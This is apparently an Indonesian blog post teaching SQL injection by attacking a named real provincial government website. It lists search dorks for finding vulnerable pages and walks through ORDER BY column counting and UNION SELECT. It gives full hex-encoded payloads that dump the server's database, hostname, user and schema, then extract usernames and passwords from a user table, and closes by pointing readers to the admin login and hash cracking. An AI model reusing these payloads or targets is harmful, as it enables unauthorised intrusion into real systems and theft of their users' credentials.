Label

cara sql injection




PENGENALAN SQL INJECTION

SQL INJECTION adalah suatu teknik hacking yang digunakan oleh attacker untuk mendapatkan sebuah database dengan menyisipkan perintah-perintah SQL melalui url dengan memanfaatkan bug yang disebabkan oleh kesalahan coding atau kurang pemfilteran variabel.

CIRI - CIRI VULN SQLI

Untuk mengetahui web tersebut, vuln sqli atau yang terkena celah sqli adalah dengan membuat error url atau membuat halaman tersebut berubah, caranya kita harus menambahkan karakter (') petik pada id parameter.


contoh : 
site.co.li/index.php?id=1'

maka akan keluar pesan seperti ini :

Warning: Unknown: write failed: Disk quota exceeded (122) in Unknown on line 0
Warning: Unknown: Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0

Langkah -langkah :

Yang pertama kita harus dorking dulu

inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=

Dan selanjutnya ini kita coba jadikan target https://binamarga.sulselprov.go.id/news.php?id=6

Langsung saja kita cek, apakah web ini vuln atau tidak dengan menambahkan karakter (') setelah id parameter
https://binamarga.sulselprov.go.id/news.php?id=6'





oke ternyata target kita vuln sqli dengan ciri - ciri berubah dari tampilan awal.

selanjutnya kita tambahkan karakter order by sampai dengan bertemu error

https://binamarga.sulselprov.go.id/news.php?id=6'+order+by+1--+  (normal)
https://binamarga.sulselprov.go.id/news.php?id=6'+order+by+2--+  (normal)
https://binamarga.sulselprov.go.id/news.php?id=6'+order+by+3--+  (normal)

kita naikan angka terus sampai bertemu error. Saya menemukan error di 6

https://binamarga.sulselprov.go.id/news.php?id=6%27+order+by+6--+ (error)

selanjutnya, kita ganti order by menjadi union select, karena kita menemukan error di 6 maka kita union select sampai 5, dan tambahkan karakter (.) atau (-) sebelum angka

https://binamarga.sulselprov.go.id/news.php?id=.6'+union+select+1,2,3,4,5--+






oke keluar angka togelnya (angka ajaib) yaitu 2 dan 4, di sini saya akan mencoba memilih angka 2

selanjutnya kita tambah kan diosnya,  ganti angka 2 dengan dios kalian

https://binamarga.sulselprov.go.id/news.php?id=.6'+union+select+1,CONCAT(0x3c696d67207372633d2268747470733a2f2f692e6962622e636f2f334d38677156482f313534323032313433343630312e6a7067223e,0x3c62723e,0x496e6a656374204279202e2f63306433782e337272,0x3c62723e,0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x4469726563746f7279203a3a20,@@datadir,0x3c62723e,0x486f73746e616d65203a3a20,@@hostname,0x3c62723e,0x55736572203a3a20,user(),(select(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(select+(@a)+from+(information_schema.columns)+where+(table_schema!=0x696e666f726d6174696f6e5f736368656d61)+and(0x00)in+(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),Concat(0x3c62723e,0x5461626c65203a3a20,@tbl:=table_name,0x3c62723e7e20,column_name),concat(0x7e20,(column_name)))))))a)),3,4,5--+

oke database web tersebut sudah keluar, selanjutnya tinggal kita dump

kita cari dulu table yang sekiranya terdapat username dan password, di taget saya terletak di table pw_users

CONCAT(0x3c696d67207372633d2268747470733a2f2f692e6962622e636f2f334d38677156482f313534323032313433343630312e6a7067223e,0x3c62723e,0x496e6a656374204279202e2f63306433782e337272,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(@x)from(as_user)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x))

Ganti as_user dengan nama table, username dan password sesuai database yang kalian temukan

https://binamarga.sulselprov.go.id/news.php?id=.6'+union+select+1,CONCAT(0x3c696d67207372633d2268747470733a2f2f692e6962622e636f2f334d38677156482f313534323032313433343630312e6a7067223e,0x3c62723e,0x496e6a656374204279202e2f63306433782e337272,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(@x)from(pw_users)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,userpassword))))x)),3,4,5--+





done:v username dan password sudah keluar :) tinggal kalian cari adlog dan hash password tersebut 

sekian tutorial dari saya, bila masih bingung bisa bertaya di instagram saya @c0d3x_3r0r
Label:

Komentar

Posting Komentar

Postingan Populer